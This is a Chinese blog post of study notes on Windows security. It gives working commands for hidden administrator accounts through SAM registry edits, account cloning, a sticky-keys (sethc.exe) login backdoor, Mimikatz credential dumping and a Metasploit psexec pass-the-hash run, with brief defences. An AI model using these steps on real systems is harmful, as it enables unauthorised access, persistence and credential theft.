Windows系统安全小结

本文不定期更新，将阶段性的总结记录到博客中，方便以后查看~

Windows用户相关命令及隐藏用户：

查看所有用户：net users

查看指定用户user1：net user user1

添加指定用户user1：net user user1 password1 /add

删除指定用户user1：net user user1 /del

简单地隐藏用户：

添加隐藏用户test（在账户名后面添加$）：

net user test$ /add

net localgroup administrators test$ 123456 /add

这样在命令行下是看不到的：

但是在右键“我的电脑”>管理>用户 中却可以看到，即没有很好地隐藏起来：

通过注册表隐藏用户：

要实现很好的隐藏，需要通过注册表，运行中输入regedit，然后点击HKEY_LOCAL_MACHINE>SAM>SAM,，然后添加相应的权限：

接着重新打开可以看到SAM目录签有+号可以打开：

对test$和0x3F0目录右键导出。

若想给test$用户赋权，则可以将该用户的键值（例子中为0x3f0）改为Administrator的所对应的键值即可。

导出0x1F4目录。

接着打开0x3F0目录导出的文件，可以看到F表示用户信息，V表示权限信息：

接着，用1f4文件中F的键值替换3f0中F的键值：

接着在命令行删除test$用户：

可以看到test$用户的信息被删除了。

然后双击刚刚修改过的3f0文件，提示是否将内容添加进注册表：

选择Yes，接着对刚刚导出的test$.reg文件进行同样的操作，然后进入注册表中查看：

查看得到刚刚删除的test$用户又显示出来了。

重新刷新查看计算机管理中的用户和命令行下的net users命令，没有显示该用户：

接着注销当前账户后就可以使用test$用户登录了。

但是上述的方法在注册表中仍然可以查看到，这时可以通过rootkit工具实现超级隐藏，具体的操作可以网上查相应的rootkit工具的使用。

防御方法：

通过任务管理器查看是否存在用户名后接$的用户，若存在则需要通过杀毒软件找到相应的隐藏文件再将其删除。

Windows账号克隆：

Windows账号克隆的整个步骤为：

1、禁用账号guest

2、改guest密码：net user guest pass

3、运行>regedit>HKEY_LOCAL_MACHINE>SAM>SAM>Domains>Account>Users，1F4：Administrator，1F5：guest

4、将Administrator中1F4的F值复制给guest中1F5的F值即可

Windows服务器权限分析：

常见用户（权限从高到低）：SYSTEM、Administrator、Guest（默认是禁用的）

常见用户组：Administrators（最高权限）、Backup Operators（不如Administrators权限高，但差不多）、Guests（与USER组权限相同）、Distributed COM Users、Network Configuration Operators、Performance Log Users、Performance Monitor Users、Power Users、Print Operators、Users、IIS_WPG

Windows2003默认权限：

1、默认只安装静态HTTP服务器

2、增强的文件访问控制

3、父目录被禁用

4、坚持最小特权原则

Windows 2k3 server shift后门：

五次shift（粘滞键>sethc.exe 替换为cmd.exe、explorer.exe），前提是破坏WFP即Windows文件保护

整个利用过程：

1、cd c:\windows\system32\dllcache

attrib -s -r -h sethc.exe

+r或-r [文件名] 设置文件属性是否为只读 

+h或-h [文件名] 设置文件属性是否隐含 

+s或-s [文件名] 设置文件属性是否为系统文件

ren sethc.exe ~.* （文件重命名，使其调用不了）

2、cd c:\windows\system32

attrib -s -r -h sethc.exe

copy cmd.exe sethc.exe

注销用户，在登录界面中连续输入5次shift键：

输入explorer.exe直接绕过登录成功：

防御方法：

cd c:\windows\system32

cacls sethc.exe /p everyone:n

再去尝试5次shift已经没有效果了。

Windows密码安全性测试：

1、本地管理员密码如何获取：

(1)、Mimikatz：

关于该工具的使用在《关于本地提权的学习笔记（二）：注入进程和利用漏洞提权》中已经讲过，这里不再多说。

privilege::debug提升权限

sekurlsa::logonpassWords抓取密码

(2)、GetPass.exe：

通常在Webshell情况下无法进入mimikatz的框架内，这时使用GetPass.exe >> 1.txt的方式可以将密码信息导出到指定文件中方便命令行的方式进行阅读。

(3)、LaZagne：

支持Windows和Linux，具体的可以上网查询如何下载安装使用。

2、本地Hash远程攻击：

主要通过MSF提供的exploit/windows/smb/psexec模块来实现

use exploit/windows/smb/psexec

set RHOST 10.10.10.144

set SMBUser administrator

set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

exploit

shell

3、本地Hash暴力破解：

(1)、通过LC5暴力破解Hash密码

(2)、通过Ophcrack破解系统Hash密码

软件捆绑类远控、后门查杀：

1、查看进程：

netstat -an

netstat -ano多显示一个PID

tasklist /svc

2、查看服务：

可以使用工具XueTr

微软服务的描述在最后都是由句号的，而第三方的服务是没有的。

先将dll文件删除，然后终止进程关闭服务。